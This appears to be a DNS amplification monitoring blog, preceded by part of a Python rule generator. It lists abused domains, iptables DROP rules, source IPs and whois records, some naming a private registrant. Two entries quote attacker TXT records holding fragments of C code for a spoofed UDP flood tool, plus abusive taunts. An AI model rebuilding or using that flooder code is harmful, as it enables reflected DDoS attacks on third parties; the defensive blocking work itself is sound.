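            f'"{u32_expression(domain, any_first_label)}" -j DROP '
            f'-m comment --comment "DROP DNS Q {domain}"')


def string_rule(domain: str, any_first_label: bool = False) -> str:
    """xt_string variant: the exact QNAME bytes searched in [from, to). For the
    wildcard form the first label is skipped, as the page's x.slnm.info rule
    does. xt_string compares case-sensitively unless --icase is added."""
    wire, _ = qname_wire_and_mask(domain)
    start = QNAME_OFFSET
    if any_first_label:
        skip = 1 + wire[0]  # length byte + label content
        wire, start = wire[skip:], start + skip
    return (f"iptables --insert INPUT -p udp --dport 53 -m string --from {start} "
            f"--to {start + len(wire)} --algo bm --hex-string '|{wire.hex()}|' "
            f'-j DROP -m comment --comment "DROP DNS Q {domain}"')


def u32_matches(expr: str, packet: bytes) -> bool:
    """Evaluate a u32 expression (generated or copied from a rule) against a raw
    IPv4 packet as xt_u32 does: every test must hold, and a 4-byte load that
    runs past the end of the packet fails the match."""
    for test in expr.split("&&"):
        lhs, value = test.strip().split("=")
        off, mask = (int(x, 16) for x in lhs.split("&"))
        if off + 4 > len(packet):
            return False
        (word,) = struct.unpack("!I", packet[off:off + 4])
        if word & mask != int(value, 16):
            return False
    return True


def dns_query_packet(qname: str) -> bytes:
    """Constructed IPv4/UDP/DNS query for qname (type ANY, class IN) behind a
    plain 20-byte IP header; checksums are left zero, which the offset math
    does not depend on."""
    wire, _ = qname_wire_and_mask(qname)
    dns = struct.pack("!HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0) + wire + struct.pack("!HH", 255, 1)
    udp = struct.pack("!HHHH", 40000, 53, 8 + len(dns), 0) + dns
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
                     bytes([10, 0, 0, 1]), bytes([10, 0, 0, 53]))
    return ip + udp


def check_rule(domain: str, any_first_label: bool = False) -> dict:
    """Does the generated u32 test hit the lower- and upper-case spelling of the
    query and miss an unrelated name?"""
    expr = u32_expression(domain, any_first_label)
    return {
        "lower": u32_matches(expr, dns_query_packet(domain)),
        "upper": u32_matches(expr, dns_query_packet(domain.upper())),
        "other": u32_matches(expr, dns_query_packet("example.invalid")),
    }


if __name__ == "__main__":
    for name, wild in (("marusiaattack.pw", False), ("x.slnm.info", True)):
        print(u32_rule(name, wild))
        print(string_rule(name, wild))
        print(check_rule(name, wild))
```

Running it prints the rules for marusiaattack.pw and x.slnm.info; the generated u32 expressions and hex strings are byte-for-byte the ones on this page. Two caveats the rules themselves do not state: the fixed 0x28 offset assumes a 20-byte IP header, so the u32 form does not see a query whose IP header carries options, and the string form only drops the exact case it was written in unless `--icase` is added.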

Source:


Unknown

Name server:

;; ANSWER SECTION:
slnm.info. 21600 IN NS ns1.slnm.info.
slnm.info. 21600 IN NS ns2.slnm.info.

ns1.slnm.info. 86189 IN A 199.217.118.89
ns2.slnm.info. 86189 IN A 199.217.118.89


Response:


TXT 1
Rsize: 3950



TXT record:

x.slnm.info. 81241 IN TXT "void attack(unsigned long srcip, int srcport, unsigned long destip, int destport, char *message){int s = socket (PF_INET, SOCK_RAW, IPPROTO_UDP)\;char packet[4096]\;struct iphdr *iph = (struct iphdr *)packet\;structtcphd" ">" "struct sockaddr_in sin\;struct pseudo_header psh\;sin.sin_family = AF_INET\;sin.sin_port = htons(destport)\;sin.sin_addr.s_addr = destip\; memset (packet, 0, 4096)\;iph->ihl = 5\;iph->version = 4\;iph->tos = 16\;iph->tot_len = sizeof (struct ip) + sizeof (s" ">" "iph->id = htonl (54321)\; iph->frag_off = 0\;iph->ttl = 255\;iph->protocol = IPPROTO_UDP\;iph->check = 0\;iph->saddr = srcip\;iph->daddr = sin.sin_addr.s_addr\;udph->source = htons(srcport)\;strncpy((char *)udph + sizeof (struct udphdr),message, 4096 - (si" ">" "void *thread_attack(void *thread_params){struct pthread_param *params = thread_params\;\009int i\;\009while (1)for (i = 0\; i < params->list_size\; i++)attack(params->victim_ip, rand() % 65534 + 1, params->list[i].ip, params->list[i].port, params->message)\;" ">" "printf(Usage: %s <destip> <destport> <ip_file_list> <time in seconds> <message>/n, argv[0])\;if (argc != 6){printf(JoyPowerBot: %s <destip> <destport> <ip_file_list> <time in seconds> <message>/n, argv[0])\;return -1\;}srand(time(0))\;FILE *pFile =----" ">" "param.list_size = list_size\;param.message = /xFF/xFF/xFF/xFF/x67/x65/x74/x73/x74/x61/x74/x75/x73/x10\;pthread_create( &udp_attack, NULL, thread_attack, (void*) &param)\;printf([*] Attacking../n)\;sleep(atoi(argv[4]))\;printf([!] 
Done/n)\;return 0\;------" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" 
"dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "GREATINGS:  ----FUKOFF FOR PAIN(QQ NOOB) I FUCKED UR MUM YESTERDAY.\;---- HI ALL DNSssssss. WANNA SEE 300gbit?@24/7? I WILL SHOW U, CUZ U ARE ASSHOLES\;----  QQ dnsamplication, u are the best, ty man for this blog\;)*kissing* u are doing a good work.--- " ">" "8===========================================================================================================================================================================>"


Whois


Domain ID:D51025000-LRMS
Domain Name:SLNM.INFO
Created On:16-Nov-2013 18:49:09 UTC
Last Updated On:16-Nov-2013 18:55:53 UTC
Expiration Date:16-Nov-2014 18:49:09 UTC
Sponsoring Registrar:Internet Invest, Ltd. dba Imena.ua (R503-LRMS)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Status:ADDPERIOD
Registrant ID:DI_14171185
Registrant Name:Whois privacy protection service
Registrant Organization:Internet Invest, Ltd. dba Imena.ua
Registrant Street1:Gaidara, 50 st.
Registrant Street2:
Registrant Street3:
Registrant City:Kyiv
Registrant State/Province:
Registrant Postal Code:01033
Registrant Country:UA
Registrant Phone:+380.442010102
Registrant Phone Ext.:
Registrant FAX:+380.442010100
Registrant FAX Ext.:
Registrant Email:hostmaster@imena.ua
Admin ID:DI_14171185
Admin Name:Whois privacy protection service
Admin Organization:Internet Invest, Ltd. dba Imena.ua
Admin Street1:Gaidara, 50 st.
Admin Street2:
Admin Street3:
Admin City:Kyiv
Admin State/Province:
Admin Postal Code:01033
Admin Country:UA
Admin Phone:+380.442010102
Admin Phone Ext.:
Admin FAX:+380.442010100
Admin FAX Ext.:
Admin Email:hostmaster@imena.ua
Billing ID:DI_14171185
Billing Name:Whois privacy protection service
Billing Organization:Internet Invest, Ltd. dba Imena.ua
Billing Street1:Gaidara, 50 st.
Billing Street2:
Billing Street3:
Billing City:Kyiv
Billing State/Province:
Billing Postal Code:01033
Billing Country:UA
Billing Phone:+380.442010102
Billing Phone Ext.:
Billing FAX:+380.442010100
Billing FAX Ext.:
Billing Email:hostmaster@imena.ua
Tech ID:DI_14171185
Tech Name:Whois privacy protection service
Tech Organization:Internet Invest, Ltd. dba Imena.ua
Tech Street1:Gaidara, 50 st.
Tech Street2:
Tech Street3:
Tech City:Kyiv
Tech State/Province:
Tech Postal Code:01033
Tech Country:UA
Tech Phone:+380.442010102
Tech Phone Ext.:
Tech FAX:+380.442010100
Tech FAX Ext.:
Tech Email:hostmaster@imena.ua
Name Server:NS1.SLNM.INFO
Name Server:NS2.SLNM.INFO
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 



Friday, November 15, 2013

Domain: thebestdomainintheworld.cloudns.eu

Domain: thebestdomainintheworld.cloudns.eu

The biggest DNS response I've seen!

If you are seeing queries for this domain, then you are likely participating in DNS amplification attacks, and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently being DDoS-ed! Good luck.


IPtables:


There are two iptables rules available. If your distribution supports the iptables 'u32' module, pick that one; otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x17544845 && 0x2c&0xDFDFDFDF=0x42455354 && 0x30&0xDFDFDFDF=0x444f4d41 && 0x34&0xDFDFDFDF=0x494e494e && 0x38&0xDFDFDFDF=0x54484557 && 0x3c&0xDFDFDFDF=0x4f524c44 && 0x40&0xFFDFDFDF=0x07434c4f && 0x44&0xDFDFDFDF=0x55444e53 && 0x48&0xFFDFDFFF=0x02455500" -j DROP -m comment --comment "DROP DNS Q thebestdomainintheworld.cloudns.eu"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 76 --algo bm --hex-string '|1774686562657374646f6d61696e696e746865776f726c6407636c6f75646e7302657500|' -j DROP -m comment --comment "DROP DNS Q thebestdomainintheworld.cloudns.eu"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


223.130.85.119 ; Korea, Republic of ; AS46010 SAMJUNG DATA SERVICE

Name server:


;; ANSWER SECTION:
thebestdomainintheworld.cloudns.eu. 3600 IN NS ns1.cloudns.net.
thebestdomainintheworld.cloudns.eu. 3600 IN NS ns2.cloudns.net.
thebestdomainintheworld.cloudns.eu. 3600 IN NS ns4.cloudns.net.
thebestdomainintheworld.cloudns.eu. 3600 IN NS ns3.cloudns.net.


Response:


A 1345
NS 4
SOA 1
Rsize 21683

http://pastebin.com/9K5Re6Sf

Whois


%
% The EURid WHOIS service on port 43 (textual whois) never
% discloses any information concerning the registrant.
% Registrant and onsite contact information can be obtained through use of the
% webbased whois service available from the EURid website www.eurid.eu
%
% WHOIS thebestdomainintheworld.cloudns.eu
-7: Invalid pattern



Thursday, November 14, 2013

Domain: x.mpnp.info

Domain: x.mpnp.info

Also seeing:

g.mpnp.info
j.mpnp.info
a.mpnp.info
z.mpnp.info


Another domain with a personalized message! I feel so special.

If you are seeing queries for this domain, then you are likely participating in DNS amplification attacks, and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently being DDoS-ed! Good luck.


IPtables:

Updated the rule below to match any single-character subdomain of mpnp.info:

There are two iptables rules available. If your distribution supports the iptables 'u32' module, pick that one; otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFF00FFDF=0x0100044d && 0x2c&0xDFDFDFFF=0x504e5004 && 0x30&0xDFDFDFDF=0x494e464f && 0x34&0xFF000000=0x00000000" -j DROP -m comment --comment "DROP DNS Q x.mpnp.info"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 42 --to 53 --algo bm --hex-string '|046d706e7004696e666f00|' -j DROP -m comment --comment "DROP DNS Q x.mpnp.info"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


No IP source for this domain

Name server:

mpnp.info.              86400   IN      NS      ns2.mpnp.info.
mpnp.info.              86400   IN      NS      ns1.mpnp.info.

ns1.mpnp.info.          86400   IN      A       149.3.143.130
ns2.mpnp.info.          77502   IN      A       149.3.143.130

Response:


TXT 1
Rsize 3948


"void attack(unsigned long srcip, int srcport, unsigned long destip, int destport, char *message){int s = socket (PF_INET, SOCK_RAW, IPPROTO_UDP)\;char packet[4096]\;structiphdr *iph = (struct iphdr *)packet\;structtcphd" ">" "struct sockaddr_in sin\;struct pseudo_header psh\;sin.sin_family = AF_INET\;sin.sin_port = htons(destport)\;sin.sin_addr.s_addr = destip\; memset (packet, 0, 4096)\;iph->ihl = 5\;iph->version = 4\;iph->tos = 16\;iph->tot_len = sizeof (struct ip) + sizeof (s" ">" "iph->id = htonl (54321)\; iph->frag_off = 0\;iph->ttl = 255\;iph->protocol = IPPROTO_UDP\;iph->check = 0\;iph->saddr = srcip\;iph->daddr = sin.sin_addr.s_addr\;udph->source = htons(srcport)\;strncpy((char *)udph + sizeof (struct udphdr),message, 4096 - (si" ">" "void *thread_attack(void *thread_params){struct pthread_param *params = thread_params\;\009int i\;\009while (1)for (i = 0\; i < params->list_size\; i++)attack(params->victim_ip, rand() %65534 + 1, params->list[i].ip, params->list[i].port, params->message)\;" ">" "printf(Usage: %s <destip> <destport> <ip_file_list> <time in seconds> <message>/n, argv[0])\;if (argc != 6){printf(JoyPowerBot: %s <destip> <destport> <ip_file_list> <time in seconds> <message>/n, argv[0])\;return -1\;}srand(time(0))\;FILE *pFile =---- " ">" "param.list_size = list_size\;param.message = /xFF/xFF/xFF/xFF/x67/x65/x74/x73/x74/x61/x74/x75/x73/x10\;pthread_create( &udp_attack, NULL, thread_attack, (void*) &param)\;printf([*] Attacking../n)\;sleep(atoi(argv[4]))\;printf([!] Done/n)\;return 0\;------" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "GREATINGS:  ----FUKOFF FOR PAIN(QQ NOOB) I FUCKED UR MUM YESTERDAY.\;---- QQ DDOS-GUARD. WANNA SEE 300gbit?@24/7? I WILL SHOW U, CUZ U ARE ASSHOLES\;----  QQ dnsamplication, u are the best, ty man for this blog\;)*kissing* u are doing a good work.--- " ">" "8===========================================================================================================================================================================>"


Well interesting...

Whois


Domain ID:D51006486-LRMS
Domain Name:MPNP.INFO
Created On:13-Nov-2013 16:04:31 UTC
Last Updated On:13-Nov-2013 16:22:32 UTC
Expiration Date:13-Nov-2014 16:04:31 UTC
Sponsoring Registrar:DomainContext Inc. (R524-LRMS)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Status:ADDPERIOD
Registrant ID:PP-SP-001
Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org
Registrant Street1:ID#10760, PO Box 16
Registrant Street2:Note - Visit PrivacyProtect.org to contact the domain owner/operator
Registrant Street3:
Registrant City:Nobby Beach
Registrant State/Province:
Registrant Postal Code:QLD 4218
Registrant Country:AU
Registrant Phone:+45.36946676
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:contact@privacyprotect.org
Admin ID:PP-SP-001
Admin Name:Domain Admin
Admin Organization:PrivacyProtect.org
Admin Street1:ID#10760, PO Box 16
Admin Street2:Note - Visit PrivacyProtect.org to contact the domain owner/operator
Admin Street3:
Admin City:Nobby Beach
Admin State/Province:
Admin Postal Code:QLD 4218
Admin Country:AU
Admin Phone:+45.36946676
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:contact@privacyprotect.org
Billing ID:PP-SP-001
Billing Name:Domain Admin
Billing Organization:PrivacyProtect.org
Billing Street1:ID#10760, PO Box 16
Billing Street2:Note - Visit PrivacyProtect.org to contact the domain owner/operator
Billing Street3:
Billing City:Nobby Beach
Billing State/Province:
Billing Postal Code:QLD 4218
Billing Country:AU
Billing Phone:+45.36946676
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:contact@privacyprotect.org
Tech ID:PP-SP-001
Tech Name:Domain Admin
Tech Organization:PrivacyProtect.org
Tech Street1:ID#10760, PO Box 16
Tech Street2:Note - Visit PrivacyProtect.org to contact the domain owner/operator
Tech Street3:
Tech City:Nobby Beach
Tech State/Province:
Tech Postal Code:QLD 4218
Tech Country:AU
Tech Phone:+45.36946676
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:contact@privacyprotect.org
Name Server:NS1.MPNP.INFO
Name Server:NS2.MPNP.INFO
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:



Domain: lrc-pipec.com

Domain: lrc-pipec.com

If you are seeing queries for this domain, then you are likely participating in DNS amplification attacks, and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently being DDoS-ed! Good luck.


IPtables:


There are two iptables rules available. If your distribution supports the iptables 'u32' module, pick that one; otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x094c5243 && 0x2c&0xFFDFDFDF=0x2d504950 && 0x30&0xDFDFFFDF=0x45430343 && 0x34&0xDFDFFF00=0x4f4d0000" -j DROP -m comment --comment "DROP DNS Q lrc-pipec.com"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 55 --algo bm --hex-string '|096c72632d706970656303636f6d00|' -j DROP -m comment --comment "DROP DNS Q lrc-pipec.com"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


89.248.172.203

Name server:


;; ANSWER SECTION:
lrc-pipec.com. 10800 IN NS b.dns.gandi.net.
lrc-pipec.com. 10800 IN NS c.dns.gandi.net.
lrc-pipec.com. 10800 IN NS a.dns.gandi.net.


Response:


A 242
MX 2
NS 3
SOA 1
Rsize 4041


Whois



Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: LRC-PIPEC.COM
Registrar: GANDI SAS
Whois Server: whois.gandi.net
Referral URL: http://www.gandi.net
Name Server: A.DNS.GANDI.NET
Name Server: B.DNS.GANDI.NET
Name Server: C.DNS.GANDI.NET
Status: clientTransferProhibited
Updated Date: 07-nov-2013
Creation Date: 07-nov-2013
Expiration Date: 07-nov-2014

>>> Last update of whois database: Fri, 15 Nov 2013 00:22:49 UTC <<<

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.


The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: lrc-pipec.com
Registry Domain ID: 1834550409_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2013-11-07T19:11:08Z
Creation Date: 2013-11-07T16:12:26Z
Registrar Registration Expiration Date: 2014-11-07T15:12:26Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller:
Domain Status: clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID:
Registrant Name: Viktor BARINOV
Registrant Organization:
Registrant Street: Gandi, 63-65 boulevard Massena
Registrant City: (Gandi) Paris
Registrant State/Province:
Registrant Postal Code: (Gandi) 75013
Registrant Country: (Gandi) FR
Registrant Phone: (Gandi) +33.170377666
Registrant Phone Ext:
Registrant Fax: (Gandi) +33.143730576
Registrant Fax Ext:
Registrant Email: 105e9ac19694fce132c4aacf57a58490-1806369@contact.gandi.net
Registry Admin ID:
Admin Name: Viktor BARINOV
Admin Organization:
Admin Street: Gandi, 63-65 boulevard Massena
Admin City: (Gandi) Paris
Admin State/Province:
Admin Postal Code: (Gandi) 75013
Admin Country: (Gandi) FR
Admin Phone: (Gandi) +33.170377666
Admin Phone Ext:
Admin Fax: (Gandi) +33.143730576
Admin Fax Ext:
Admin Email: 105e9ac19694fce132c4aacf57a58490-1806369@contact.gandi.net
Registry Tech ID:
Tech Name: Viktor BARINOV
Tech Organization:
Tech Street: Gandi, 63-65 boulevard Massena
Tech City: (Gandi) Paris
Tech State/Province:
Tech Postal Code: (Gandi) 75013
Tech Country: (Gandi) FR
Tech Phone: (Gandi) +33.170377666
Tech Phone Ext:
Tech Fax: (Gandi) +33.143730576
Tech Fax Ext:
Tech Email: 105e9ac19694fce132c4aacf57a58490-1806369@contact.gandi.net
Name Server: A.DNS.GANDI.NET
Name Server: B.DNS.GANDI.NET
Name Server: C.DNS.GANDI.NET
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2013-11-15T00:23:17Z <<<

Reseller Email:
Reseller URL:

Personal data access and use are governed by French law, any use for
the purpose of unsolicited mass commercial advertising as well as any
mass or automated inquiries (for any intent other than the
registration or modification of a domain name) are strictly forbidden.
Copy of whole or part of our database without Gandi's endorsement is
strictly forbidden.
The owner of a domain is the person specified as "Registrant Name" for
a natural person and "Registrant Organization" for a legal person.
Domain ownership disputes should be settled using ICANN's Uniform
Dispute Resolution Policy: http://www.icann.org/en/help/dndr#udrp



Monday, November 11, 2013

Domain: cheatsharez.com

Domain: cheatsharez.com

If you are seeing queries for this domain, then you are likely participating in DNS amplification attacks, and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently being DDoS-ed! Good luck.


IPtables:


There are two iptables rules available. If your distribution supports the iptables 'u32' module, pick that one; otherwise use the 'string' rule.

*Fixed typo in rule

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x0b434845 && 0x2c&0xDFDFDFDF=0x41545348 && 0x30&0xDFDFDFDF=0x4152455a && 0x34&0xFFDFDFDF=0x03434f4d && 0x38&0xFF000000=0x00000000" -j DROP -m comment --comment "DROP DNS Q cheatsharez.com"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 57 --algo bm --hex-string '|0B636865617473686172657a03636f6d00|' -j DROP -m comment --comment "DROP DNS Q cheatsharez.com"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


94.102.49.37

Name server:


;; ANSWER SECTION:
cheatsharez.com.        17508   IN      NS      ns2.cheatsharez.com.
cheatsharez.com.        17508   IN      NS      ns1.cheatsharez.com.

;; ADDITIONAL SECTION:
ns2.cheatsharez.com.    17508   IN      A       89.248.168.94
ns1.cheatsharez.com.    17508   IN      A       89.248.168.94



Response:


A 242
NS 2
SOA 1
Rsize 3969


Whois



Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: CHEATSHAREZ.COM
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Referral URL: http://www.enom.com
Name Server: NS1.CHEATSHAREZ.COM
Name Server: NS2.CHEATSHAREZ.COM
Status: clientTransferProhibited
Updated Date: 11-nov-2013
Creation Date: 11-nov-2013
Expiration Date: 11-nov-2014

>>> Last update of whois database: Tue, 12 Nov 2013 06:48:31 UTC <<<

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.


The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.


Domain Name: CHEATSHAREZ.COM
Creation Date: 2013-11-11 16:29:00Z
Registrar Registration Expiration Date: 2014-11-11 16:29:00Z
Registrar: ENOM, INC.
Reseller: NAMECHEAP.COM
Registrant Name: WHOISGUARD PROTECTED
Registrant Organization: WHOISGUARD, INC.
Registrant Street: P.O. BOX 0823-03411
Registrant City: PANAMA
Registrant State/Province: PANAMA
Registrant Postal Code: NA
Registrant Country: PA
Admin Name: WHOISGUARD PROTECTED
Admin Organization: WHOISGUARD, INC.
Admin Street: P.O. BOX 0823-03411
Admin City: PANAMA
Admin State/Province: PANAMA
Admin Postal Code: NA
Admin Country: PA
Admin Phone: +507.8365503
Admin Phone Ext:
Admin Fax: +51.17057182
Admin Fax Ext:
Admin Email: 33A60AC6876943FBB733252AE9E1386D.PROTECT@WHOISGUARD.COM
Tech Name: WHOISGUARD PROTECTED
Tech Organization: WHOISGUARD, INC.
Tech Street: P.O. BOX 0823-03411
Tech City: PANAMA
Tech State/Province: PANAMA
Tech Postal Code: NA
Tech Country: PA
Tech Phone: +507.8365503
Tech Phone Ext:
Tech Fax: +51.17057182
Tech Fax Ext:
Tech Email: 33A60AC6876943FBB733252AE9E1386D.PROTECT@WHOISGUARD.COM
Name Server: NS1.CHEATSHAREZ.COM
Name Server: NS2.CHEATSHAREZ.COM


We reserve the right to modify these terms at any time. By submitting
this query, you agree to abide by these terms.
Version 6.3 4/3/2002



Sunday, November 10, 2013

Domain: hccforums.nl

Domain: hccforums.nl

Attack using a legit domain. Have not seen any attacks yet. Only scanning.

If you are seeing queries for this domain, then you are likely participating in DNS amplification attacks, and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently being DDoS-ed! Good luck.


IPtables:


There are two iptables rules available. If your distribution supports the iptables 'u32' module, pick that one; otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x09484343 && 0x2c&0xDFDFDFDF=0x464f5255 && 0x30&0xDFDFFFDF=0x4d53024e && 0x34&0xDFFF00FF=0x4c0000ff" -j DROP -m comment --comment "DROP DNS Q ANY hccforums.nl"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 56 --algo bm --hex-string '|09686363666f72756d73026e6c0000ff|' -j DROP -m comment --comment "DROP DNS Q hccforums.nl"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


93.174.93.139 - AS29073 Ecatel Network

Name server:


;; ANSWER SECTION:
hccforums.nl. 3600 IN NS ns1.hobby.nl.
hccforums.nl. 3600 IN NS ns2.hobby.nl.
hccforums.nl. 3600 IN NS ns3.hobby.nl.


Response:


A 13
AAAA 2
DNSKEY 3
MX 5
NS 9
NSEC3PARAM 2
RRSIG 7
SOA 2
Rsize 3444


Whois


Domain name: hccforums.nl
Status: active

Registrar:
HCC
Jansweg 38
2011KN HAARLEM
Netherlands

DNSSEC: yes

Domain nameservers:
ns2.hobby.nl
ns3.hobby.nl
ns1.hobby.nl

